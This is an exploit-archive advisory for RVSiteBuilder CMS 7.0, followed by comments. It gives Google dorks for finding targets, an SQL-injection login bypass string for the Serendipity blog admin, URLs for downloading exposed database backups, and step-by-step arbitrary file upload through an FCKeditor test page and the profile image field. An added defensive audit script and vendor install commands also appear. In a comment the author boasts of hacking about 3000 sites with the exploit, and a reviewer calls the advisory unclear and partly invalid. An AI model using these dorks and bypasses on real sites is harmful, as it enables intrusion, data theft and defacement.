RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection

Posted Feb 14, 2019
Authored by KingSkrupellos

RVSiteBuilder RVGlobalSoft CMS version 7.0 suffers from bypass, database disclosure, file download, path disclosure, remote file upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure, file upload
MD5 | 3c019473a8382ff8cf5b15499f6ea3ab

#################################################################################################

# Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities

Vulnerabilities are =>
******************
SQL Injection / File Upload / Authentication Bypass / Database Disclosure

# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 14/02/2019
# Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com
+ dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
+ twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
# Version : 7.0 and all previous versions.
# Google Dork : inurl:''/rvsindex.php/''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types : CWE-209 [ Information Exposure Through an Error Message ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-200 [ Information Exposure ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
+ CWE-592 [ Authentication Bypass Issues ]
+ CWE-23 [ Relative Path Traversal ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-36 [ Absolute Path Traversal ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-548 [ Information Exposure Through Directory Listing ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101

#################################################################################################

# RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities
*********************************************************************************************

# Vulnerabilities and Exploits includes =>
************************************

1) Full Path Disclosure Vulnerability
2) SQL Injection Vulnerability
3) Arbitrary File Upload Vulnerability
4) Arbitrary File Download Database Backup .sql Vulnerability
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload
6) Blog Administration Control Panel Authentication Bypass Vulnerability
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
8) Information Exposure Through an Error Message
9) Permissions, Privileges, and Access Controls

#################################################################################################

# Description : RVglobalsoft is the leading software solution for hosting providers.
***********************************************************************

# Google Dork 1 : inurl:''/rvsindex.php/''

# Google Dork 2 : inurl:''/rvsindex.php?/user/login''

# Google Dork 3 : inurl:''/rvsindex.php/user/register''

# Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js

#################################################################################################

# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] =>
*****************************************************************************************

TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]

FOR CPANEL =>

pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

FOR DIRECTADMIN =>

pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with
SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with
SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Non-static method SGL_FrontController::isGoToClearCached()
should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear
/RVSeagullMod/lib/SGL/FrontController.php on line 257

Strict Standards: Declaration of SGL_MDB2::query() should be compatible with
MDB2_Driver_Common::query($query, $types = NULL, $result_class =
true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish
/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82

Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename()
should not be called statically, assuming $this from incompatible context in
/opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60

Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS
/public_html/rvscommonfunc.php on line 174
Please contact your host provider ssh as root to server and run.

Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20

####################################################################################################

PATH => TARGET/ComponentAndUserFramework.php

Please edit /home2/DOMAINADDRESS/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54
/usr/share/pear:/usr/local/lib/php"

# PATH for View Homepage => TARGET/rvsindex.php

####################################################################################################

# RevSiteBuilder Admin Login Control Panel Authentication Bypass =>
**************************************************************

TARGET/admin or this is the Admin Panel way =>

/rvsindex.php?/user/login/

# PATH Admin Panel Login WordPress =>

TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1

# PATH Admin Panel Login Joomla =>

TARGET/administrator

# PATH Admin Panel Login osCommerce =>

TARGET/admin

# PATH Admin Panel Login OpenCart =>

TARGET/admin

Note : Some RVSiteBuilder websites use WordPress and Joomla,
but all files belong to the RVSiteBuilder and RVGlobalSoft software.
It is a totally weird vulnerability.

They have path like TARGET/blogweb or TARGET/osc

But some sites give this error. Sometimes it asks for a username and password.

Please contact your provider edit file php.ini
change include_path to
include_path = ".:/usr/lib/php:/usr/local/lib/php"
save file and restart apache

####################################################################################################

# PATH for Uploaded Documents =>

TARGET/documents/

####################################################################################################

# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] =>

TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/

# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources

####################################################################################################

# PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/

####################################################################################################

# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/

####################################################################################################

# PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo

####################################################################################################

# PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG

####################################################################################################

# PATH Learn Version => TARGET/js/scriptaculous/VERSION

####################################################################################################

# PATH for Optimizer => TARGET/optimizer.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

# Other Paths that gives same error =>

#TARGET/rvsMasterCompoDB.php
#TARGET/rvsStaticWeb.php
#TARGET/rvscommonfunc.php
#TARGET/rvssetup.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

#QuickForm tutorial example - *Enter your name:

#/scripts/rvslib/Pear/quickFormTest.php
#/themes/default/default/testForms.html

####################################################################################################

#{if:adminApprove} {adminApprove}
#/themes/rvtheme/authweb/authPage.html

####################################################################################################

#{foreach:aFaqData,key,aValue} {if:aValue.category_name}
#/themes/rvtheme/faqweb/viewFaqWeb.html

###################################################################################################

#{if:forumsInstall} - Search for forums
#TARGET/themes/rvtheme/forums/blocksearch.html

####################################################################################################

# Testing forms
# /themes/default/testForms.php

#################################################################################################

# RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability

# TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login

# Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADDRESS

#################################################################################################

# {translate(pageTitle)} Contactus
# /themes/rvtheme/main/contactMail.html

#################################################################################################

#{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
#/themes/rvtheme/newsletter/authorize.html
#/themes/rvtheme/newsletter/list.html
#/themes/rvtheme/newsletter/uikit_list.html

#################################################################################################

#RVTheme Admin Area and Users useable Login Paths =>

#/themes/rvtheme/user/account.html
#/themes/rvtheme/user/accountSummary.html
#/themes/rvtheme/user/blockLogin.html
#/themes/rvtheme/user/blockLogout.html
#/themes/rvtheme/user/horizontalBlockLogin.html
#/themes/rvtheme/user/loginForgot.html
#/themes/rvtheme/user/prefUserEdit.html
#/themes/rvtheme/user/profile.html
#/themes/rvtheme/user/uikit_login.html
#/themes/rvtheme/user/uikit_loginForgot.html
#/themes/rvtheme/user/uikit_prefUserEdit.html
#/themes/rvtheme/user/uikit_userAddUseCompoDB.html
#/themes/rvtheme/user/uikit_userPasswordEdit.html
#/themes/rvtheme/user/userAdd.html
#/themes/rvtheme/user/userAddUseCompoDB.html
#/themes/rvtheme/user/userPasswordEdit.html
#/themes/rvtheme/user/verticalBlockLogin.html
#/themes/rvtheme_admin/articleweb/admin_articleEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleManager.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
#/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
#/themes/rvtheme_admin/css/

#####################################################################################################

#Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt

#####################################################################################################

#Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js

#####################################################################################################

Getting started with Seagull Project => [ Seagull PHP Framework - (c) Seagull Systems 2003-2007 ]

/rvsindex.php?/default/masterLayout/layout-navtop-3col.css/

#####################################################################################################

# RevSiteBuilder SQL Injection Vulnerability =>
*****************************************

#Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be
compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local
/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible
with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php
/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

#################################################################################################

# What You See Is What You Get [ WYSIWYG ] Exploiter =>
*******************************************************

# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit

# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

# Example Site => /images/....

# Allowed File Extensions => .txt .png .gif .jpg .xml

# Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server

Please contact your host provider ssh as root to server and run.

For cpanel
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

For directadmin
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

Tutorial '' How to download RVsiteBuilder package file manually ? ''

For cPanel
--------------------

SSH to your cPanel server as root and run command

cd /usr/local/cpanel/whostmgr/docroot/cgi/

rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/

rm -f rvsitebuilderinstaller.tar

wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar

tar -xvf rvsitebuilderinstaller.tar

rm -f rvsitebuilderinstaller.tar

mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

/usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php

Once the file has been downloaded manually, please follow the instructions at this link: https://www.rvsitebuilder.com/installation/

--------------------

For DirectAdmin

--------------------

SSH to your cPanel server as root and run command

cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

php scriptdownloadpackage.php

Once the file has been downloaded manually, please follow the instructions at this link: https://www.rvsitebuilder.com/installation/

Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/

Reference => rvskin.com/rvlogin/rvloginssh

##################################################################################################

# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability

# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql

# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql

# Example Site DB Backup View => archive.is/Demkr

###################################################################################################

1) Register yourself to the site

TARGET/rvsindex.php?/user/register/

It says => You have successfully been registered. Please check your email for confirmation of your password.

Note : Confirm your registration in order to proceed.
Sometimes RVSiteBuilder and RVGlobalsoft give you a new password, or you choose your password during registration.
Pay attention : When you register, choose your nickname carefully because it is important.

It says => Activation is successfully. Please login.

2) Login to the User Interface =>

TARGET/rvsindex.php?/user/login/action/login

3) You can use Account - User Preference - User Password Change Area

/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/

4) Go to your Profile like this =>

TARGET/rvsindex.php?/user/account/action/viewProfile/

Edit these Values

Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)

It says => Your profile details have been successfully updated

PATH : /themes/rvtheme/images/YOURNICKNAME.

Note : The nickname you chose during registration is important. Upload your html or txt file but do not put like this .yournickname.html

Just . [ dot ] is important here. You will see your index on that site.

#################################################################################################

# Serendipity RevSiteBuilder Blog Administration

# /blogweb/serendipity_admin.php

# Username : '=''or'
# Password : '=''or'

# You can use for both of them as '' admin '' '' admin ''

# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true

# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal

# /blogweb/uploads/yourfilename.rar

# Solution for Serendipity Blog Administration

# To mitigate this issue please upgrade at least to version 2.0.2:

# Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

# Please note that a newer version might already be available.

#################################################################################################

How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess

cPanel
SSH to your server as root and install the plugin 'RVglobalsoft manager' by running the following shell command:
cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh
Log in to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager, then follow the simple install process.
Configure the plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.

DirectAdmin
1. SSH to your server as "root" and install the plugin 'RVglobalsoft manager' by running the following shell command:
cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh
2. For a DirectAdmin panel with PHP version 5.5 only (if your panel has a lower version of PHP, skip to step 3)
2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl
2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod
3. Open the file 'directadmin.conf' located at /usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15.
4. Go to Directadmin > Admin level > and run 'RVsitebuilder Admin', then follow the simple install process.
5. Log in to DirectAdmin as "admin" and configure the plugin on your panel.
RVsitebuilder in DirectAdmin plugins cannot configure hosting plans, but
you can set plans at user level with RVsitebuilder Admin.
Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'
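
The "check every folder" step from the heading of this section, as an added example that is not part of the original advisory or the vendor's tooling: a POSIX shell function that walks a local document root and reports the files this advisory lists as reachable over HTTP, so they can be removed or restricted with .htaccess. File names come from the advisory; the function names, labels, the generic `*.sql` sweep and the sample tree are assumptions of this example.

```shell
#!/bin/sh
# Added example, not the advisory author's or the vendor's code.
# Audits a LOCAL document root for files this advisory lists as web-reachable.
# File names come from the advisory; function names, labels, the generic *.sql
# sweep and the sample tree are assumptions of this example.

# Prefix every stdin line with "<label><TAB>".
rvs_label() {
    while IFS= read -r rvs_line; do
        printf '%s\t%s\n' "$1" "$rvs_line"
    done
}

# Print "label<TAB>path" for each finding under the document root "$1".
rvs_audit_docroot() {
    rvs_root=${1%/}
    [ -d "$rvs_root" ] || { echo "not a directory: $1" >&2; return 2; }

    # Database dumps: the two names from the advisory get their own label;
    # any other *.sql left inside the web root is reported as well.
    find "$rvs_root" -type f -name '*.sql' | sort | while IFS= read -r rvs_f; do
        case ${rvs_f##*/} in
            rvsDbBackup.sql|rvsPageData.sql) printf 'db-backup\t%s\n' "$rvs_f" ;;
            *) printf 'sql-file\t%s\n' "$rvs_f" ;;
        esac
    done

    # FCKeditor connector test page and the form test pages.
    find "$rvs_root" -type f \( \
        -path '*/filemanager/connectors/uploadtest.html' \
        -o -name 'quickFormTest.php' \
        -o -name 'testForms.php' -o -name 'testForms.html' \) |
        sort | rvs_label test-page

    # Bundled jQuery UI demos, tests and docs.
    find "$rvs_root" -type d \( -path '*/js/jquery-ui/demos' \
        -o -path '*/js/jquery-ui/tests' -o -path '*/js/jquery-ui/docs' \) |
        sort | rvs_label demo-content

    # Version disclosure files.
    if [ -f "$rvs_root/version.txt" ]; then
        printf 'version-info\t%s\n' "$rvs_root/version.txt"
    fi
    find "$rvs_root" -type f \( -path '*/js/scriptaculous/VERSION' \
        -o -path '*/js/scriptaculous/CHANGELOG' \) |
        sort | rvs_label version-info
    return 0
}

# Build a constructed sample tree (no real site data) and print its path.
rvs_make_sample_tree() {
    rvs_t=$(mktemp -d) || return 1
    mkdir -p "$rvs_t/rvsUtf8Backup" "$rvs_t/blogweb" "$rvs_t/js/jquery-ui/demos" \
        "$rvs_t/wysiwyg/fckeditor/editor/filemanager/connectors"
    : > "$rvs_t/rvsDbBackup.sql"
    : > "$rvs_t/rvsUtf8Backup/rvsPageData.sql"
    : > "$rvs_t/blogweb/old-dump.sql"
    : > "$rvs_t/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html"
    : > "$rvs_t/version.txt"
    : > "$rvs_t/index.php"
    printf '%s\n' "$rvs_t"
}

# Usage: sh rvs_audit.sh /home/USER/public_html
if [ -n "${1:-}" ]; then
    rvs_audit_docroot "$1"
fi
```

Every path it prints is a candidate for deletion from the web root or for an .htaccess deny rule; an empty result means none of the listed files are present.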

#################################################################################################

RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/

RVSiteBuilder Installation => rvsitebuilder.com/installation/

RVSiteBuilder and RVGlobalSoft Tutorials =>

rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm Digital Security Team

#################################################################################################

Comments (2)

osvdb

This advisory is absolutely horrible. It's not very clear, and several of the issues pointed out don't appear to be vulnerabilities at all.

Comment by osvdb
2019-02-19 21:43:24 UTC | Permalink | Reply
kingskrupellos

Dear @osvdb ;

No - It is a wonderful topic. Maybe you didn't understand how to do that.
Because I have hacked many sites, [ approximately ] 3000 websites, only with this exploit.
Believe it or don't believe it. This is the reality.
Do not make nonsense comments under my files.
For example => Ask if you don't understand how to exploit it.

For Example => Zone-H Defacement Archive [ Year 2015 ]=>

Proof of Concept ;


Mostly Vulnerable Area for this Vulnerability/Exploit =>

##################################################################################################

# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability

# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql

# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql

# Example Site DB Backup View => archive.is/Demkr

###################################################################################################

# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit

# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

1) Register yourself to the site

TARGET/rvsindex.php?/user/register/

It says => You have successfully been registered. Please check your email for confirmation of your password.

Note : Confirm your registration in order to proceed.
Sometimes RVSiteBuilder and RVGlobalsoft give you a new password, or you choose your password during registration.
Pay attention : When you register, choose your nickname carefully because it is important.

It says => Activation is successfully. Please login.

2) Login to the User Interface =>

TARGET/rvsindex.php?/user/login/action/login

3) You can use Account - User Preference - User Password Change Area

/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/

4) Go to your Profile like this =>

TARGET/rvsindex.php?/user/account/action/viewProfile/

Edit these Values

Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)

It says => Your profile details have been successfully updated

PATH : /themes/rvtheme/images/YOURNICKNAME.

Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html

Just . [ dot ] is important here. You will see your index on that site.

#################################################################################################

# Serendipity RevSiteBuilder Blog Administration

# /blogweb/serendipity_admin.php

# Username : '=''or'
# Password : '=''or'

# You can use for both of them as '' admin '' '' admin ''

# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true

# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal

# /blogweb/uploads/yourfilename.rar

# Solution for Serendipity Blog Administration

# To mitigate this issue please upgrade at least to version 2.0.2:

# Download Link : github.com/s9y/Serendipity/rel…

# Please note that a newer version might already be available.

#################################################################################################

# VULNERABLE WEBSITES =>


########## THE END #############

Comment by kingskrupellos
2019-02-21 00:34:37 UTC | Permalink | Reply